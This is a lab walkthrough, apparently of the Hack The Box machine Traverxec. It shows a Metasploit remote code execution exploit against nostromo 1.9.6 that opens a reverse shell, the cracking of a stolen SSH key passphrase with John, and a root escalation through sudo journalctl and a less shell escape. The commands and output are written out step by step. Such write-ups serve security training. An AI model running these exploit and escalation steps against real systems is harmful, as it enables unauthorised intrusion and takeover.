For the initial foothold we had to exploit a web server that was vulnerable to remote code execution and get a reverse shell back into our machine. For root, the user David had privilege to execute journalctl as root and we leveraged that to get root in the box. With that said let’s jump in.

We begin our reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.

m1m3@kali:~$ nmap -sC -sV -oA nmap/traverxec

Starting Nmap 7.80 ( )
Nmap scan report for
Host is up (0.27s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 38.14 seconds

We see that the port 80 is open and it is running nostromo 1.9.6. Looking at port 80, we have a static website with nothing useful.

Initial Foothold:

Now let’s look on searchsploit if we have a vulnerable version of nostromo.

m1m3@kali:~$ searchsploit nostromo

--------------------------------------------------------- ----------------------------------------
 Exploit Title                                           |  Path
                                                         | (/usr/share/exploitdb/)
--------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution  | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                   | exploits/multiple/remote/
nostromo nhttpd 1.9.3 - Directory Traversal Remote Comma | exploits/linux/remote/
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

We have RCE available. Let’s use the metasploit for it.

msf5 > search nostromo

Matching Modules

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

msf5 > use exploit/multi/http/nostromo_code_exec 
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened ( -> at 2020-03-25 04:18:35 +0530

We get a TCP reverse shell which we can turn into a tty shell using:

python -c 'import pty;pty.spawn("/bin/bash")'

If we type id we get the user of the shell:

www-data@traverxec:/usr/bin$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

User Shell:

With some enumeration, we can see a nostromo configuration file present at /var/nostromo/conf that reveals a public home directory.

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf


homedirs          /home
homedirs_public   public_www

Based on the config file, I am guessing that david is going to have a sub directory named public_www, so let’s see if we can get a directory listing of /home/david/public_www

www-data​ @traverxec​ :/var/nostromo/htdocs​ $ ​ ls /home/david/public_www -lah

ls /home/david/public_www -lah
total ​ 16​ K
drwxr-xr-x ​ 3 ​ david david ​ 4.0​ K Oct ​ 25​ ​ 15​ : ​ 45​ .
drwx--x--x ​ 5 ​ david david ​ 4.0​ K Oct ​ 25​ ​ 17​ : ​ 02​ ..
-rw-r--r-- ​ 1 ​ david david ​ 402​   Oct ​ 25​ ​ 15​ : ​ 45​ index.html
drwxr-xr-x ​ 2 ​ david david ​ 4.0​ K Oct ​ 25​ ​ 17​ : ​ 02​ protected-file-area

After looking inside the protected-file-area I found a backup-ssh-identity-files.tgz. After copying it to my machine, I found the private ssh key for David. We can now use john to crack the key and ssh into the box.

m1m3@kali:~$ /usr/share/john/ id_rsa > id_rsa.txt
m1m3@kali:~$ john id_rsa.txt

Press 'q' ​ or​ Ctrl-C ​ to​ abort, almost any other key for status
hunter      (david)
Session completed

Hurray! We found the key for David. Now lets ssh into the box and grab the user flag.

m1m3@kali:~$ ssh -i id_rsa david@
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64

david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david)

david@traverxec:~$ wc -c user.txt
33 user.txt

Root Shell:

The first thing I noticed when I got the user when doing privilege escalation is there is a bin directory inside David’s home directory it has a file called

david@traverxec:~/bin$ cat


cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Last line of the script tells us that david can run /usr/bin/journalctl with sudo. So I searched in GTFO bin’s and exploited the less prompt that opens up as sudo using !/bin/bash.

david@traverxec:/dev/shm$ ./
# id
uid=0(root) gid=0(root) groups=0(root)
# wc -c /root/root.txt
33 root.txt

That’s it! Thanks for reading! Make sure to stay tuned for more upcoming Hack The Box writeups!

NOTE: The awesome artwork used in this article was created by Kanye.